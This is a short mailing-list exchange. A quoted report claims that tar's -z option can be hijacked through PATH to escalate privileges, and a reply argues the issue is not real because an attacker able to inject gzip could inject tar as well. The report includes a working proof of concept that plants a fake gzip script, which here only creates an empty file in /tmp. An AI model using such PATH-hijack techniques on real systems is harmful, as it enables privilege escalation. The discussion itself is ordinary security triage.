On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote: > Hi! > > As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. > When using the -z switch for gzip compression/decompression the binary calls > “gzip” without absolute path, hence allowing the path Hijack. > While this, in a normal scenario can be totally harmless, it can be used as a > privileged escalation technique when the tar binary is called as root user. > > Following lines will provide a basic PoC: > ---- > export PATH=$(pwd):$PATH > echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip > chmod +x gzip > touch file.txt > tar -zcf backup.tar.gz file.txt > ls -la /tmp/tarred > -rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred > ---- > > I have not tested switches for other compression/decompression formats, so > there is a chance that they can be used as well as gzip. >
Do you realize that if you have sufficient access to inject "gzip", you may inject "tar" as well, right? -- Best regards, Michał Górny
